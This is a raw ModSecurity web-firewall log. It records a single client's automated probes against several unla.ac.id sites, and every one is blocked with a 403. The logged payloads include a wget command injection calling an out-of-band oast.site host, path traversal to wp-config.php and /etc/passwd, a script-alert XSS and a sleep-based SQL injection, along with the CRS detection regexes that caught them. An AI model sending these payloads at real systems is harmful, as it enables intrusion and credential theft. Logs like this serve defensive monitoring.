[Tue Aug 29 11:41:45.495652 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gn4zakgcan6xwy.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdDO1kAAAAV"]
[Tue Aug 29 11:41:45.656632 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gdzxgmz3hozn6s.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAUKhOoAAABC"]
[Tue Aug 29 11:41:46.376886 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gex8d9n51pq4ga.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13CsCo-f0AAAc92rQAAAAD"]
[Tue Aug 29 11:41:46.396327 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAcqJUAAAAAG"]
[Tue Aug 29 11:41:46.420298 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc0NlwAAAAM"]
[Tue Aug 29 11:41:46.427277 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAQSWtIAAAA0"]
[Tue Aug 29 11:41:46.501187 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc92rkAAAAD"]
[Tue Aug 29 11:41:46.553544 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAc0Nl8AAAAM"]
[Tue Aug 29 11:41:47.400830 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13C8Co-f0AAAUKhPEAAABC"]
[Tue Aug 29 11:41:49.383084 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAdECUkAAAAW"]
[Tue Aug 29 11:41:49.387304 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGEAAAAT"]
[Tue Aug 29 11:41:49.397198 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAc-5vQAAAAN"]
[Tue Aug 29 11:41:49.472560 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGMAAAAT"]
[Tue Aug 29 11:41:49.552707 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAXHqGYAAAAT"]
[Tue Aug 29 11:41:50.565201 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DsCo-f0AAAQkBjUAAAAC"]
[Tue Aug 29 11:41:56.378322 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdJqQIAAAAC"]
[Tue Aug 29 11:41:56.393616 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdECXQAAAAW"]
[Tue Aug 29 11:41:56.405038 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNIAAAAS"]
[Tue Aug 29 11:41:56.425429 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAcvBggAAAAJ"]
[Tue Aug 29 11:41:56.472868 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdOeNUAAAAS"]
[Tue Aug 29 11:41:57.424858 2023] [:error] [pid 1878] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdW2X4AAAAb"]
[Tue Aug 29 11:41:57.425866 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdV7XgAAAAa"]
[Tue Aug 29 11:41:57.428534 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAcvBhMAAAAJ"]
[Tue Aug 29 11:41:57.432981 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdPLv4AAAAT"]
[Tue Aug 29 11:41:57.487224 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdPLwAAAAAT"]
[Tue Aug 29 11:41:57.522520 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FcCo-f0AAAdUcxQAAAAZ"]
[Tue Aug 29 11:41:58.374944 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO13FsCo-f0AAAdPLwIAAAAT"]
[Tue Aug 29 11:41:58.412294 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAdZZnoAAAAf"]
[Tue Aug 29 11:41:58.421872 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13FsCo-f0AAAc@cVAAAAAL"]
[Tue Aug 29 11:41:59.677415 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdECZIAAAAW"]
[Tue Aug 29 11:41:59.682939 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAQSWxAAAAA0"]
